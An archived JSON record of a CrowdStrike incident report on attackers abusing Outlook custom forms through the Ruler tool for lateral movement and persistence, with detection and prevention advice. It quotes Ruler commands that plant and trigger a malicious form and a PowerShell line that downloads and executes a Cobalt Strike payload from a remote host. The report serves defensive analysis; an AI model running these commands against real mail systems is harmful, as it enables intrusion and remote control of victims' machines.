{
	"id": "664c1dfe-2762-464c-9dd5-cd040405a282",
	"created_at": "2026-04-06T02:11:49.472335Z",
	"updated_at": "2026-04-10T03:21:25.85771Z",
	"deleted_at": null,
	"sha1_hash": "9ab542938b31476127f7e08454c5a2a76cb2eb03",
	"title": "Using Outlook Forms for Lateral Movement and Persistence - Malware News - Malware Analysis, News and Indicators",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 55584,
	"plain_text": "Using Outlook Forms for Lateral Movement and Persistence -\r\nMalware News - Malware Analysis, News and Indicators\r\nPublished: 2017-07-22 · Archived: 2026-04-06 02:06:46 UTC\r\nBy CrowdStrike Services: Tim Parisi, Doug Clendening and Jai Musunuri\r\nBackground\r\nDuring a recent CrowdStrike Services investigation, we identified an adversary attack method, used for lateral\r\nmovement and persistence, that we have not seen used before. The attack leveraged customized forms – not\r\nmacros – in Microsoft Outlook that allowed Visual Basic code to execute on a system just by opening or\r\npreviewing an email message.\r\nA detailed explanation of the Outlook forms attack can be found in the SensePost article here. This article below\r\ndetails CrowdStrike’s observations responding to an adversary that used this attack, including a high-level walk-through of the adversary’s actions, along with our detection and prevention methods.\r\nWalk-through\r\nShortly after responding to our client’s call, we performed forensic analysis and identified that the adversary had\r\naccessed the client’s single-factor authentication Outlook Web Access (OWA) server using previously harvested\r\ncredentials. With access to the victim’s OWA server, the adversary created custom message forms to a set of users\r\nin the victim organization’s environment. The custom forms, when triggered through an email, allowed the\r\nadversary to execute code on the victim system.\r\nTo create custom forms, the adversary used the Ruler utility. In this case, the adversary created a custom Outlook\r\nform that enabled Visual Basic code execution and embedded the Cobalt Strike downloader to the email message.\r\nThis allowed shell access and full read, write, and execute permissions on the system each time an email was sent\r\nto the user using the custom malicious form.\r\nBelow is a sample command using Ruler to create a custom form, specifying the file “/test/CobaltStrike.txt”,\r\nwhich contained Visual Basic code to download and launch Cobalt Strike, and then sending an email to trigger the\r\nform:\r\n./ruler –email user@victim.com form add –suffix MaliciousForm –input /test/CobaltStrike.txt –send\r\nFigure 1: Sample Ruler command to create the form “MaliciousForm” and send an email to the victim\r\n1. The above command performed the following actions:\r\nCreated the custom form “MaliciousForm” in the “user@victim.com” mailbox\r\n2. Sent an email to “user@victim.com” from the same sender “user@victim.com”\r\na. The email contained the default Ruler subject of “Invoice [Confidential]”\r\n3. Cobalt Strike was downloaded and executed on the victim system, granting shell access to the adversary\r\nhttps://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746\r\nPage 1 of 3\n\nThe payload embedded in the adversary email contained the following code, which downloaded and executed a\r\nCobalt Strike payload:\r\nCreateObject(“WScript.Shell”).Run “cmd /c powershell.exe -NoP -sta -w hidden -c IEX ((new-object\r\nnet.webclient).downloadstring(‘hxxp://:80/updater’))”\r\nFigure 2: Email payload that is executed on victim system with custom form\r\nThe adversary employed this attack as a novel approach to move laterally within the environment without using\r\ntraditional RDP or network logons, and bypassing the jump box that was in place between network segments in\r\nthe victim organization. The adversary also leveraged this attack to maintain persistence in the environment by\r\nsimply sending emails to any mailboxes that had the malicious custom form previously created through the\r\nfollowing sample command:\r\n./ruler –email user@victim.com form send –suffix MaliciousForm\r\nFigure 3: Sample Ruler command to send email with a payload to a victim that already has a custom form created\r\nin their mailbox\r\nSo how can organizations detect and protect themselves from this?\r\nDetection\r\nOne way to detect this activity is to monitor OWA IIS logs for the Ruler user agent string, which is “ruler.” A\r\nsample OWA IIS log below shows the adversary accessing the victim’s OWA server with the Ruler utility:\r\ncs-method=POST cs-uri-stem=/autodiscover/autodiscover.xml cs-uri-query=- s-port=444 cs-username=DOMAIN\\account c-ip=192.168.1.1 cs-version=HTTP/1.1 cs(User-Agent)=ruler cs(Referer)=- sc-status=200 sc-substatus=0 sc-win32-status=0 time-taken=31\r\nFigure 4: Sample OWA IIS log showing the Ruler user agent “ruler” being used by the adversary\r\nAnother detection method involves the Windows registry. Custom forms can be identified by searching the\r\nregistry for the following keys that contain values other than “IPM.Note.” In the example below, the Custom Form\r\nCompose, Read and Preview keys are populated with the “IPM.Note.MaliciousForm” values:\r\nKey: [HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Custom Forms\\Compose] Name:\r\nIPM.Note\r\nType: String\r\nValue: IPM.Note.MaliciousForm\r\nKey: [HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Custom Forms\\Read] Name:\r\nIPM.Note\r\nType: String\r\nValue: IPM.Note.MaliciousForm\r\nKey: [HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Custom Forms\\Preview] Name:\r\nIPM.Note\r\nType: String\r\nValue: IPM.Note.MaliciousForm\r\nFigure 5: Registry keys and values that show a custom form is being used on the system when composing, reading\r\nor previewing an email\r\nhttps://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746\r\nPage 2 of 3\n\nLastly, if the adversary does not change the default Ruler subject, SMTP traffic that contains the default subject of\r\n“Invoice [Confidential]” should be reviewed. In addition, monitoring utilities should have rules configured that\r\nalert on emails that contain the default Ruler subject of “Invoice [Confidential]”.\r\nPrevention\r\nTo perform this attack, the adversary needed to gain access to the Microsoft Exchange server, which in this case,\r\nonly required single-factor authentication. Organizations should ensure that all aspects of their user base – whether\r\ncorporate or third-party – are using two-factor authentication for email access.\r\nIn addition, organizations should implement an advanced endpoint protection platform, such as CrowdStrike\r\nFalcon®, that leverages machine learning to identify anomalies and perform heuristics, in addition to detecting\r\nand preventing known and unknown threats in real time. An endpoint agent such as CrowdStrike Falcon would\r\nhave prevented the Cobalt Strike payload from successfully executing on the system, and prevented the adversary\r\nfrom moving laterally throughout the victim environment.\r\nLearn more about detecting and preventing threats in real time by visiting our CrowdStrike Falcon platform page,\r\nor visit this page for details on CrowdStrike’s pre- and post-incident response services.\r\nThe post Using Outlook Forms for Lateral Movement and Persistence appeared first on .\r\nArticle Link: https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/\r\nSource: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746\r\nhttps://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746"
	],
	"report_names": [
		"13746"
	],
	"threat_actors": [],
	"ts_created_at": 1775441509,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ab542938b31476127f7e08454c5a2a76cb2eb03.pdf",
		"text": "https://archive.orkl.eu/9ab542938b31476127f7e08454c5a2a76cb2eb03.txt",
		"img": "https://archive.orkl.eu/9ab542938b31476127f7e08454c5a2a76cb2eb03.jpg"
	}
}